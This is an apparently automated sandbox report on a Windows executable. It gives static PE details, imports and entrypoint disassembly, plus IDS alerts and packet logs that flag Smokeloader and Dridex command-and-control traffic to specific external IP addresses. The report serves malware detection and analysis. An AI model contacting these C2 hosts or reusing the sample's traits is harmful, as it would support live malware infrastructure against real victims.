                                                                                                                          TLSH:D7245A017AF19026EFBB4B75197096942E3BBCF26A7081DE3144361F99733D399A1363
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........IB...B...B...\...^...\...Q...\.......eu..E...B...2...\...C...\...C...\...C...RichB...........................PE..L......e...

                                                                                                                          File Icon

                                                                                                                          Icon Hash:17694db2b24d2117

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x401716
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6598C400 [Sat Jan 6 03:07:44 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:7529a394fc2aae97d1d4dcd49f0468b5

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          call 00007F91FCF32F2Ch
                                                                                                                          jmp 00007F91FCF2F04Eh
                                                                                                                          mov edi, edi
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          sub esp, 00000328h
                                                                                                                          mov dword ptr [0041E888h], eax
                                                                                                                          mov dword ptr [0041E884h], ecx
                                                                                                                          mov dword ptr [0041E880h], edx
                                                                                                                          mov dword ptr [0041E87Ch], ebx
                                                                                                                          mov dword ptr [0041E878h], esi
                                                                                                                          mov dword ptr [0041E874h], edi
                                                                                                                          mov word ptr [0041E8A0h], ss
                                                                                                                          mov word ptr [0041E894h], cs
                                                                                                                          mov word ptr [0041E870h], ds
                                                                                                                          mov word ptr [0041E86Ch], es
                                                                                                                          mov word ptr [0041E868h], fs
                                                                                                                          mov word ptr [0041E864h], gs
                                                                                                                          pushfd
                                                                                                                          pop dword ptr [0041E898h]
                                                                                                                          mov eax, dword ptr [ebp+00h]
                                                                                                                          mov dword ptr [0041E88Ch], eax
                                                                                                                          mov eax, dword ptr [ebp+04h]
                                                                                                                          mov dword ptr [0041E890h], eax
                                                                                                                          lea eax, dword ptr [ebp+08h]
                                                                                                                          mov dword ptr [0041E89Ch], eax
                                                                                                                          mov eax, dword ptr [ebp-00000320h]
                                                                                                                          mov dword ptr [0041E7D8h], 00010001h
                                                                                                                          mov eax, dword ptr [0041E890h]
                                                                                                                          mov dword ptr [0041E78Ch], eax
                                                                                                                          mov dword ptr [0041E780h], C0000409h
                                                                                                                          mov dword ptr [0041E784h], 00000001h
                                                                                                                          mov eax, dword ptr [0041D008h]
                                                                                                                          mov dword ptr [ebp-00000328h], eax
                                                                                                                          mov eax, dword ptr [0041D00Ch]
                                                                                                                          mov dword ptr [ebp-00000324h], eax
                                                                                                                          call dword ptr [000000D4h]

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [C++] VS2008 build 21022
                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                          • [ C ] VS2008 build 21022
                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                          • [LNK] VS2008 build 21022

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1b7440x50.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x1a1e0.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x1b4580x18.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x184.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x1825f0x18400ccffbd60daae297a16e5605ecdf8b1b9False0.791881443298969data7.491043543257427IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x1a0000x20220x2200bd2aeb775d2212e7e850380796bfcf7cFalse0.35558363970588236data5.419783316224275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x1d0000xf7ff80x1800194bf695db6178974b2a814107547425False0.2591145833333333data2.6738567633681227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .tls0x1150000x51d0x60053e979547d8c2ea86560ac45de08ae25False0.013020833333333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x1160000x1a1e00x1a20008eda3433f9130009b997d2b9c82f726False0.44921875data5.223261219518492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          AFX_DIALOG_LAYOUT0x128d080x2data5.0
                                                                                                                          ROCOCUPACOZODACAJAJ0x127d100xbf7ASCII text, with very long lines (3063), with no line terminatorsTurkishTurkey0.6010447273914463
                                                                                                                          SUZIZOXALIDEVODUGIDUVOJAPIPUCOFA0x1289080x3faASCII text, with very long lines (1018), with no line terminatorsTurkishTurkey0.6267190569744597
                                                                                                                          RT_CURSOR0x128d100x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                          RT_CURSOR0x128e400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                          RT_ICON0x116a200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5748933901918977
                                                                                                                          RT_ICON0x1178c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6484657039711191
                                                                                                                          RT_ICON0x1181700x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6981566820276498
                                                                                                                          RT_ICON0x1188380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7536127167630058
                                                                                                                          RT_ICON0x118da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5244813278008299
                                                                                                                          RT_ICON0x11b3480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.6282833020637899
                                                                                                                          RT_ICON0x11c3f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.6409836065573771
                                                                                                                          RT_ICON0x11cd780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.774822695035461
                                                                                                                          RT_ICON0x11d2580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.39712153518123666
                                                                                                                          RT_ICON0x11e1000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5613718411552346
                                                                                                                          RT_ICON0x11e9a80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6244239631336406
                                                                                                                          RT_ICON0x11f0700x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6372832369942196
                                                                                                                          RT_ICON0x11f5d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4448874296435272
                                                                                                                          RT_ICON0x1206800x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.4364754098360656
                                                                                                                          RT_ICON0x1210080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.48404255319148937
                                                                                                                          RT_ICON0x1214d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.39738805970149255
                                                                                                                          RT_ICON0x1223800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.49864620938628157
                                                                                                                          RT_ICON0x122c280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.5213133640552995
                                                                                                                          RT_ICON0x1232f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.5614161849710982
                                                                                                                          RT_ICON0x1238580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TurkishTurkey0.350103734439834
                                                                                                                          RT_ICON0x125e000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TurkishTurkey0.37617260787992496
                                                                                                                          RT_ICON0x126ea80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TurkishTurkey0.39918032786885244
                                                                                                                          RT_ICON0x1278300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TurkishTurkey0.4122340425531915
                                                                                                                          RT_STRING0x12b5b80x424data0.44622641509433963
                                                                                                                          RT_STRING0x12b9e00x6c4data0.4255196304849885
                                                                                                                          RT_STRING0x12c0a80x620data0.4406887755102041
                                                                                                                          RT_STRING0x12c6c80x514data0.4576923076923077
                                                                                                                          RT_STRING0x12cbe00x660data0.4375
                                                                                                                          RT_STRING0x12d2400x66edata0.4307411907654921
                                                                                                                          RT_STRING0x12d8b00x7b2data0.42233502538071066
                                                                                                                          RT_STRING0x12e0680x7e6data0.42037586547972305
                                                                                                                          RT_STRING0x12e8500x5f4data0.4416010498687664
                                                                                                                          RT_STRING0x12ee480x6d0data0.4288990825688073
                                                                                                                          RT_STRING0x12f5180x790data0.42613636363636365
                                                                                                                          RT_STRING0x12fca80x464data0.45462633451957296
                                                                                                                          RT_STRING0x1301100xccdata0.5490196078431373
                                                                                                                          RT_GROUP_CURSOR0x12b3e80x22data1.088235294117647
                                                                                                                          RT_GROUP_ICON0x127c980x76dataTurkishTurkey0.6694915254237288
                                                                                                                          RT_GROUP_ICON0x11d1e00x76dataTurkishTurkey0.6610169491525424
                                                                                                                          RT_GROUP_ICON0x1214700x68dataTurkishTurkey0.7115384615384616
                                                                                                                          RT_VERSION0x12b4100x1a8data0.589622641509434

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dllSetPriorityClass, GetConsoleAliasesLengthW, CopyFileExW, GetNumaProcessorNode, ReadConsoleA, GetEnvironmentStringsW, WaitForSingleObject, InterlockedCompareExchange, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, SetCommState, GetCommandLineA, GlobalAlloc, GetVolumeInformationA, CopyFileW, GetConsoleAliasExesLengthW, GetSystemTimeAdjustment, WriteConsoleOutputA, GetFileAttributesA, HeapCreate, SetConsoleMode, GetBinaryTypeA, SearchPathW, GetLastError, GetProcAddress, GetLongPathNameA, MoveFileW, SearchPathA, LoadLibraryA, LocalAlloc, QueryDosDeviceW, FindAtomA, CreatePipe, GetModuleFileNameA, GetDefaultCommConfigA, GetModuleHandleA, BuildCommDCBA, PurgeComm, FatalAppExitA, WriteConsoleOutputAttribute, GetStdHandle, GetComputerNameA, HeapFree, Sleep, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapAlloc, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                                                                                                          USER32.dllGetFocus
                                                                                                                          ADVAPI32.dllObjectPrivilegeAuditAlarmW

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          TurkishTurkey

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-10-08T18:23:27.750526+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649836160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:28.876636+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649842160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:29.764123+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.649843160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:31.473826+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661260160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:32.363126+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661270160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:33.235140+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661279160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:36.225749+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661297160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:37.095845+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661302160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:38.050287+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661308160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:38.944473+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661315160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:40.657509+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661321160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:41.860681+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661327160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:42.740213+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661334160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:43.610880+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661340160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:44.513005+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661347160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:45.415476+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661355160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:46.357847+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661360160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:47.252091+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661365160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:48.814052+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661370160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:49.702109+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661375160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:50.575715+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661382160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:51.441127+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661388160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:52.527195+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661397160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:53.404922+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661404160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:55.559019+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661419160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:56.454433+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661424160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:57.351748+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661425160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:58.386607+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661426160.177.223.16580TCP
                                                                                                                          2024-10-08T18:23:59.891018+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661427160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:00.795610+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661428160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:01.754405+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661429160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:02.629838+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661430160.177.223.16580TCP
                                                                                                                          2024-10-08T18:24:20.366638+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:20.818347+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:20.948318+02002829848ETPRO MALWARE SmokeLoader encrypted module (3)223.145.40.168443192.168.2.661433TCP
                                                                                                                          2024-10-08T18:24:21.816752+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:22.092535+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:22.716146+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:23.001256+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:23.603368+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:23.881130+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:24.559269+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:24.867432+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:25.495258+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:26.230287+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:27.083217+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66143923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:27.381937+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66143923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:28.004185+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:28.284963+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:28.889008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:29.177525+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:29.775842+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:30.062705+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:30.682604+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:30.976278+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144323.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:31.837606+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:32.127269+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:32.735891+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:33.084547+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144523.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:33.708055+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:34.334207+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144623.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:35.121047+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:35.402522+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144723.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:36.013059+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:36.310731+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144823.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:36.915028+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66144923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:37.202175+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66144923.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:38.479188+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:38.785716+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145023.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:39.402725+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:39.673217+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145123.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:40.283939+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:40.573653+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145223.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:46.922823+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66145423.145.40.168443TCP
                                                                                                                          2024-10-08T18:24:47.342548+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66145423.145.40.168443TCP
                                                                                                                          2024-10-08T18:25:09.724772+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661455160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:11.261402+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661456160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:17.849622+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661457160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:25.694218+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661458160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:34.893758+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661459160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:46.638196+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661461160.177.223.16580TCP
                                                                                                                          2024-10-08T18:25:59.919254+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661462160.177.223.16580TCP
                                                                                                                          2024-10-08T18:26:00.552603+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66146323.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:01.029765+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66146323.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:17.303628+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66146523.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:17.380497+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661464190.249.249.1480TCP
                                                                                                                          2024-10-08T18:26:17.815560+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66146523.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:36.769052+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661466190.249.249.1480TCP
                                                                                                                          2024-10-08T18:26:37.622347+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66146723.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:37.988810+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66146723.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:55.070440+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.661469190.249.249.1480TCP
                                                                                                                          2024-10-08T18:26:56.007175+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.66147023.145.40.168443TCP
                                                                                                                          2024-10-08T18:26:56.524821+02002809882ETPRO MALWARE Dridex Post Checkin Activity 31192.168.2.66147023.145.40.168443TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 8, 2024 18:23:26.752580881 CEST4983680192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:26.761591911 CEST8049836160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:26.761660099 CEST4983680192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:26.761815071 CEST4983680192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:26.761830091 CEST4983680192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:26.769870043 CEST8049836160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:26.769880056 CEST8049836160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:27.749219894 CEST8049836160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:27.750324011 CEST8049836160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:27.750525951 CEST4983680192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:27.750525951 CEST4983680192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:27.755516052 CEST8049836160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:27.779172897 CEST4984280192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:27.784229040 CEST8049842160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:27.784296036 CEST4984280192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:27.790044069 CEST4984280192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:27.790143013 CEST4984280192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:27.794941902 CEST8049842160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:27.795042038 CEST8049842160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:28.876461029 CEST8049842160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:28.876527071 CEST8049842160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:28.876571894 CEST8049842160.177.223.165192.168.2.6
                                                                                                                          Oct 8, 2024 18:23:28.876636028 CEST4984280192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:28.876768112 CEST4984280192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:28.880064011 CEST4984380192.168.2.6160.177.223.165
                                                                                                                          Oct 8, 2024 18:23:28.885540962 CEST8049842160.177.223.165192.168.2.6
